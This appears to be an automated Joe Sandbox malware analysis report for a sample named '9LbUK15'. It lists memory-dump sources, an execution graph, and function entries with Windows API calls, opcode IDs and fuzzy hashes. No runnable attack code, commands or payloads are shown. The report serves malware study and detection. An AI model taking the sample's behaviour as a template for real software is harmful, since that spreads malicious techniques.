                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: std::invalid_argument::invalid_argument
                                                                                                                                              • String ID: pScheduler$version
                                                                                                                                              • API String ID: 2141394445-3154422776
                                                                                                                                              • Opcode ID: a5483bc7cd2a1e58a27b3e2178f53e3954a11aaa0d61c74f139fe87c3d2ed1cf
                                                                                                                                              • Instruction ID: 3122fea0a665ef1032727265859f97669ea40e48c80579a70b610642a631ca87
                                                                                                                                              • Opcode Fuzzy Hash: a5483bc7cd2a1e58a27b3e2178f53e3954a11aaa0d61c74f139fe87c3d2ed1cf
                                                                                                                                              • Instruction Fuzzy Hash: 28E04F34A40208B6CB26FE56E84BBC977749B1474BF94C157BC11111929BFCA78CCA89

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:9.9%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:79
                                                                                                                                              Total number of Limit Nodes:10
                                                                                                                                              execution_graph 15011 9bd738 15012 9bd77e GetCurrentProcess 15011->15012 15014 9bd7c9 15012->15014 15015 9bd7d0 GetCurrentThread 15012->15015 15014->15015 15016 9bd80d GetCurrentProcess 15015->15016 15017 9bd806 15015->15017 15020 9bd843 15016->15020 15017->15016 15018 9bd86b GetCurrentThreadId 15019 9bd89c 15018->15019 15020->15018 15021 9b4668 15022 9b467a 15021->15022 15023 9b4686 15022->15023 15027 9b4778 15022->15027 15032 9b4204 15023->15032 15025 9b46a5 15028 9b479d 15027->15028 15036 9b4888 15028->15036 15040 9b4878 15028->15040 15033 9b420f 15032->15033 15048 9b5c6c 15033->15048 15035 9b701a 15035->15025 15038 9b48af 15036->15038 15037 9b498c 15037->15037 15038->15037 15044 9b44e4 15038->15044 15042 9b4888 15040->15042 15041 9b498c 15041->15041 15042->15041 15043 9b44e4 CreateActCtxA 15042->15043 15043->15041 15045 9b5918 CreateActCtxA 15044->15045 15047 9b59db 15045->15047 15049 9b5c77 15048->15049 15052 9b5c8c 15049->15052 15051 9b73ed 15051->15035 15053 9b5c97 15052->15053 15056 9b5cbc 15053->15056 15055 9b74c2 15055->15051 15057 9b5cc7 15056->15057 15060 9b5cec 15057->15060 15059 9b75c5 15059->15055 15062 9b5cf7 15060->15062 15061 9b8909 15061->15059 15062->15061 15064 9bd061 15062->15064 15065 9bd091 15064->15065 15066 9bd0b5 15065->15066 15069 9bd210 15065->15069 15073 9bd220 15065->15073 15066->15061 15070 9bd22d 15069->15070 15071 9bd267 15070->15071 15077 9bba80 15070->15077 15071->15066 15075 9bd22d 15073->15075 15074 9bd267 15074->15066 15075->15074 15076 9bba80 3 API calls 15075->15076 15076->15074 15078 9bba8b 15077->15078 15080 9bdf78 15078->15080 15081 9bd384 15078->15081 15080->15080 15082 9bd38f 15081->15082 15083 9b5cec 3 API calls 15082->15083 15084 9bdfe7 15083->15084 15085 9bdff6 15084->15085 15088 9be060 15084->15088 15094 9be051 15084->15094 15085->15080 15089 9be08e 15088->15089 15090 9bd420 GetFocus 15089->15090 15091 9be0b7 15089->15091 15093 9be15f 15089->15093 15090->15091 15092 9be15a KiUserCallbackDispatcher 15091->15092 15091->15093 15092->15093 15095 9be08e 15094->15095 15096 9bd420 GetFocus 15095->15096 15097 9be0b7 15095->15097 15099 9be15f 15095->15099 15096->15097 15098 9be15a KiUserCallbackDispatcher 15097->15098 15097->15099 15098->15099 15100 9bd980 DuplicateHandle 15101 9bda16 15100->15101 15102 9bafb0 15105 9bb097 15102->15105 15103 9bafbf 15106 9bb0dc 15105->15106 15107 9bb0b9 15105->15107 15106->15103 15107->15106 15108 9bb2e0 GetModuleHandleW 15107->15108 15109 9bb30d 15108->15109 15109->15103

                                                                                                                                              Executed Functions

                                                                                                                                              Function 009BD729 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 295 9bd729-9bd7c7 GetCurrentProcess 299 9bd7c9-9bd7cf 295->299 300 9bd7d0-9bd804 GetCurrentThread 295->300 299->300 301 9bd80d-9bd841 GetCurrentProcess 300->301 302 9bd806-9bd80c 300->302 304 9bd84a-9bd865 call 9bd907 301->304 305 9bd843-9bd849 301->305 302->301 307 9bd86b-9bd89a GetCurrentThreadId 304->307 305->304 309 9bd89c-9bd8a2 307->309 310 9bd8a3-9bd905 307->310 309->310
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 009BD7B6
                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 009BD7F3
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 009BD830
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 009BD889
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3318831358.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_9b0000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2063062207-0
                                                                                                                                              • Opcode ID: bdcd7b34a42257001d524964383bb992cdaba5b4c8e458cf2fbf7055bcd31a29
                                                                                                                                              • Instruction ID: 3a0cf96d4c10d7e2b9d9f0fc96d28261d4c12e28d8df9da702c4a9e4b7dc27f7
                                                                                                                                              • Opcode Fuzzy Hash: bdcd7b34a42257001d524964383bb992cdaba5b4c8e458cf2fbf7055bcd31a29
                                                                                                                                              • Instruction Fuzzy Hash: D95169B0D013498FDB14DFAAD548BDEBBF1AF88314F208469E419A73A0DB745984CF65
                                                                                                                                              Function 009BD738 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 317 9bd738-9bd7c7 GetCurrentProcess 321 9bd7c9-9bd7cf 317->321 322 9bd7d0-9bd804 GetCurrentThread 317->322 321->322 323 9bd80d-9bd841 GetCurrentProcess 322->323 324 9bd806-9bd80c 322->324 326 9bd84a-9bd865 call 9bd907 323->326 327 9bd843-9bd849 323->327 324->323 329 9bd86b-9bd89a GetCurrentThreadId 326->329 327->326 331 9bd89c-9bd8a2 329->331 332 9bd8a3-9bd905 329->332 331->332
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 009BD7B6
                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 009BD7F3
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 009BD830
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 009BD889
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3318831358.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_9b0000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2063062207-0
                                                                                                                                              • Opcode ID: c8f53f539447b18880a08c9cf88f452958926347640009fd2a07e98e27ec2e2f
                                                                                                                                              • Instruction ID: 5d54e41d2c491f77796f882cc87b3f299c2db8ec7f3fb3aa863014e47e498715
                                                                                                                                              • Opcode Fuzzy Hash: c8f53f539447b18880a08c9cf88f452958926347640009fd2a07e98e27ec2e2f
                                                                                                                                              • Instruction Fuzzy Hash: 8F5139B09017098FDB14DFAAD648BDEBBF1AF88314F20C469E419A7360DB749984CF65
                                                                                                                                              Function 009BB097 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 361 9bb097-9bb0b7 362 9bb0b9-9bb0c6 call 9ba400 361->362 363 9bb0e3-9bb0e7 361->363 370 9bb0c8 362->370 371 9bb0dc 362->371 364 9bb0fb-9bb13c 363->364 365 9bb0e9-9bb0f3 363->365 372 9bb149-9bb157 364->372 373 9bb13e-9bb146 364->373 365->364 416 9bb0ce call 9bb332 370->416 417 9bb0ce call 9bb340 370->417 371->363 375 9bb17b-9bb17d 372->375 376 9bb159-9bb15e 372->376 373->372 374 9bb0d4-9bb0d6 374->371 377 9bb218-9bb2d8 374->377 378 9bb180-9bb187 375->378 379 9bb169 376->379 380 9bb160-9bb167 call 9ba40c 376->380 411 9bb2da-9bb2dd 377->411 412 9bb2e0-9bb30b GetModuleHandleW 377->412 382 9bb189-9bb191 378->382 383 9bb194-9bb19b 378->383 381 9bb16b-9bb179 379->381 380->381 381->378 382->383 385 9bb1a8-9bb1b1 call 9ba41c 383->385 386 9bb19d-9bb1a5 383->386 392 9bb1be-9bb1c3 385->392 393 9bb1b3-9bb1bb 385->393 386->385 394 9bb1e1-9bb1ee 392->394 395 9bb1c5-9bb1cc 392->395 393->392 401 9bb211-9bb217 394->401 402 9bb1f0-9bb20e 394->402 395->394 397 9bb1ce-9bb1de call 9ba42c call 9ba43c 395->397 397->394 402->401 411->412 413 9bb30d-9bb313 412->413 414 9bb314-9bb328 412->414 413->414 416->374 417->374
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 009BB2FE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3318831358.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_9b0000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                              • Opcode ID: 1551d44e2fac834528ec01cf595bc506d64280a8545638cec72bda8991b02373
                                                                                                                                              • Instruction ID: 77f194e58ed4f7ccfead9814acb148ceb1cf8c7998d4f03084734e0796a2ff99
                                                                                                                                              • Opcode Fuzzy Hash: 1551d44e2fac834528ec01cf595bc506d64280a8545638cec72bda8991b02373
                                                                                                                                              • Instruction Fuzzy Hash: 22816570A00B048FDB24DF2AD55579ABBF5FF88310F108A2DD486C7A90D7B5E849CB90
                                                                                                                                              Function 009B590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 418 9b590c-9b5916 420 9b5918-9b59d9 CreateActCtxA 418->420 422 9b59db-9b59e1 420->422 423 9b59e2-9b5a3c 420->423 422->423 430 9b5a4b-9b5a4f 423->430 431 9b5a3e-9b5a41 423->431 432 9b5a51-9b5a5d 430->432 433 9b5a60 430->433 431->430 432->433 435 9b5a61 433->435 435->435
                                                                                                                                              APIs
                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 009B59C9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3318831358.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_9b0000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                              • Opcode ID: 61fc1165c96fa9022009a91f15615af992ee3e66ff0d653664c7c395fc6188b2
                                                                                                                                              • Instruction ID: 91d5f5873f4b87e1805fab81adb64e5906404eeea58394eae12b4d34e1814675
                                                                                                                                              • Opcode Fuzzy Hash: 61fc1165c96fa9022009a91f15615af992ee3e66ff0d653664c7c395fc6188b2
                                                                                                                                              • Instruction Fuzzy Hash: 504113B0C00619CBDB24CFA9C9847DDBBB5BF48314F24809AD409AB255DB756946CF90
                                                                                                                                              Function 009B44E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 436 9b44e4-9b59d9 CreateActCtxA 439 9b59db-9b59e1 436->439 440 9b59e2-9b5a3c 436->440 439->440 447 9b5a4b-9b5a4f 440->447 448 9b5a3e-9b5a41 440->448 449 9b5a51-9b5a5d 447->449 450 9b5a60 447->450 448->447 449->450 452 9b5a61 450->452 452->452
                                                                                                                                              APIs
                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 009B59C9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3318831358.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_9b0000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                              • Opcode ID: 737b1530cc56fdd68058c4fa67147d5d2bacd500dae5f400bdadb251b3da0000
                                                                                                                                              • Instruction ID: 64eadaf16522e19b54148da8ecd5e549f7da0496deb23178d6c26a2ee3cfa25e
                                                                                                                                              • Opcode Fuzzy Hash: 737b1530cc56fdd68058c4fa67147d5d2bacd500dae5f400bdadb251b3da0000
                                                                                                                                              • Instruction Fuzzy Hash: F841E0B0C00619CBDB24CFA9C984BDEBBF5BF48314F2480AAD409AB255DB756945CF90
                                                                                                                                              Function 009BD980 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 453 9bd980-9bda14 DuplicateHandle 454 9bda1d-9bda3a 453->454 455 9bda16-9bda1c 453->455 455->454
                                                                                                                                              APIs
                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009BDA07
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3318831358.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_9b0000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                              • Opcode ID: bf6f73ea5f322d3a2051459546eb038ead5a50e41b09b2e942ff013380399ce1
                                                                                                                                              • Instruction ID: c596dbe2ad73f5cb9244a5d1d4c393bb0c37a914c0c4a90741565f4c0c67743e
                                                                                                                                              • Opcode Fuzzy Hash: bf6f73ea5f322d3a2051459546eb038ead5a50e41b09b2e942ff013380399ce1
                                                                                                                                              • Instruction Fuzzy Hash: 6A21E4B59002489FDB10CF9AD984ADEFBF8EB48320F14801AE918A3350D374A940CFA4
                                                                                                                                              Function 009BD978 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 458 9bd978-9bda14 DuplicateHandle 459 9bda1d-9bda3a 458->459 460 9bda16-9bda1c 458->460 460->459
                                                                                                                                              APIs
                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009BDA07
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3318831358.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_9b0000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                              • Opcode ID: 59d01c9bf8f6a7c81b29997f63dbe7a2123b48a4b51d8af9069dd13c1ec31916
                                                                                                                                              • Instruction ID: 194f57e4e16b8d533bbfcaa1d2c9789ae103a49d8bc77af0729e604997ec6cb3
                                                                                                                                              • Opcode Fuzzy Hash: 59d01c9bf8f6a7c81b29997f63dbe7a2123b48a4b51d8af9069dd13c1ec31916
                                                                                                                                              • Instruction Fuzzy Hash: D121E2B5900249DFDB10CFA9D584AEEBBF5FB08324F14801AE958A7350D378A950CFA4
                                                                                                                                              Function 009BB298 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 463 9bb298-9bb2d8 464 9bb2da-9bb2dd 463->464 465 9bb2e0-9bb30b GetModuleHandleW 463->465 464->465 466 9bb30d-9bb313 465->466 467 9bb314-9bb328 465->467 466->467
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 009BB2FE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3318831358.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_9b0000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                              • Opcode ID: 5a3344cc5e5dfd4e107194cb584c1487028770400c6de4446acef5c5ee3280ca
                                                                                                                                              • Instruction ID: 80c5697f98857c69f0694ec5d66efad55a4dd360d330b1ce187828b77229fb98
                                                                                                                                              • Opcode Fuzzy Hash: 5a3344cc5e5dfd4e107194cb584c1487028770400c6de4446acef5c5ee3280ca
                                                                                                                                              • Instruction Fuzzy Hash: B911E0B5D003498FCB10DF9AC544ADEFBF8EF88324F10842AD469A7250C3B9A545CFA5
                                                                                                                                              Function 0095D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3314962822.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_95d000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9856988c26afb5dcd2db822d9b069efb22f1014a8eb50071ef15147332477c2d
                                                                                                                                              • Instruction ID: 2db1f6e87a1c7e9918273893fa7e5ff19455e4fe443e9f6e5d643d04834871bb
                                                                                                                                              • Opcode Fuzzy Hash: 9856988c26afb5dcd2db822d9b069efb22f1014a8eb50071ef15147332477c2d
                                                                                                                                              • Instruction Fuzzy Hash: 20214271500200DFCB21DF14D9C0B2ABF69FB98319F20C569EC090B25AC33AD84ACBA2
                                                                                                                                              Function 0096D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3315863341.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_96d000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 37c319060913a7df879c2184356c5d57a782bbfc98279b0e42757902444e00b4
                                                                                                                                              • Instruction ID: bee8a7eef39750778e0e68b437a53049fd46eb7950d30e9f8ead4dacc1c9d91f
                                                                                                                                              • Opcode Fuzzy Hash: 37c319060913a7df879c2184356c5d57a782bbfc98279b0e42757902444e00b4
                                                                                                                                              • Instruction Fuzzy Hash: 33210475A04240DFDB14DF14D9C4B26BFA9FB88314F24C96DE81A4B296C33BD847CAA1
                                                                                                                                              Function 0096D918 Relevance: .1, Instructions: 72COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3315863341.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_96d000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 130cb7f7ab107525190a111948b1b8ce3a7a1b2248aa26deff63e630ab357ed8
                                                                                                                                              • Instruction ID: 42d968ed284a1726a90e358b2bbd004eb24b75248b7e4d889e7a430e570fec11
                                                                                                                                              • Opcode Fuzzy Hash: 130cb7f7ab107525190a111948b1b8ce3a7a1b2248aa26deff63e630ab357ed8
                                                                                                                                              • Instruction Fuzzy Hash: 43212671B06240DFDB04DF14D5C4B26BBA9FB84318F24C96DE9494B396C37AD846CBA1
                                                                                                                                              Function 0096D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3315863341.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_96d000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2bb6adb97a9833e5b680fa73ab8f8c55c3f2515400a10d65a782b70c07f27dfc
                                                                                                                                              • Instruction ID: e0a0df9807eeba5b961e92576d0af33683925a428db141637dda9c16d2ef58f3
                                                                                                                                              • Opcode Fuzzy Hash: 2bb6adb97a9833e5b680fa73ab8f8c55c3f2515400a10d65a782b70c07f27dfc
                                                                                                                                              • Instruction Fuzzy Hash: 99215E755093808FDB12CF24D994B15BF71EB46314F28C5EAD8498F6A7C33A980ACB62
                                                                                                                                              Function 0095D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3314962822.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_95d000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                              • Instruction ID: a4054b9ab832bf5919886f06b2a44e348a4f9d9efe6536363ff6181a8965a46a
                                                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                              • Instruction Fuzzy Hash: E311D376504280CFDB16CF14D5C4B16BF71FB94318F24C6A9EC490B65AC336D85ACBA1
                                                                                                                                              Function 0096D913 Relevance: .1, Instructions: 53COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3315863341.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_96d000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                              • Instruction ID: bfd724a45ebffe3dc78ba396e1f51e10280a5ea113e415b3c50e1c5c39246679
                                                                                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                              • Instruction Fuzzy Hash: 2E11DD75A05280DFCB02CF14D5C4B15BFA1FB84318F24C6AAD8494B256C33AD84ACBA1
                                                                                                                                              Function 0095D95D Relevance: .0, Instructions: 45COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3314962822.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_95d000_9LbUK15.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fdeddddd3c77ae88e003f7ad623724e94f3cefc6ab386c74d8007e63735b1b31
                                                                                                                                              • Instruction ID: 5d3344cdb6e9aab7559e91e9ad878daf88f50db84aff9fa417a1022a8194ca5b
                                                                                                                                              • Opcode Fuzzy Hash: fdeddddd3c77ae88e003f7ad623724e94f3cefc6ab386c74d8007e63735b1b31
                                                                                                                                              • Instruction Fuzzy Hash: 9401A77110B3409AE720DA17CD94767FF9CEF51325F18C829ED494B296C2799848D771
                                                                                                                                              Function 0095D95C Relevance: .0, Instructions: 36COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.3314962822.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_95d000_9LbUK15.jbxd
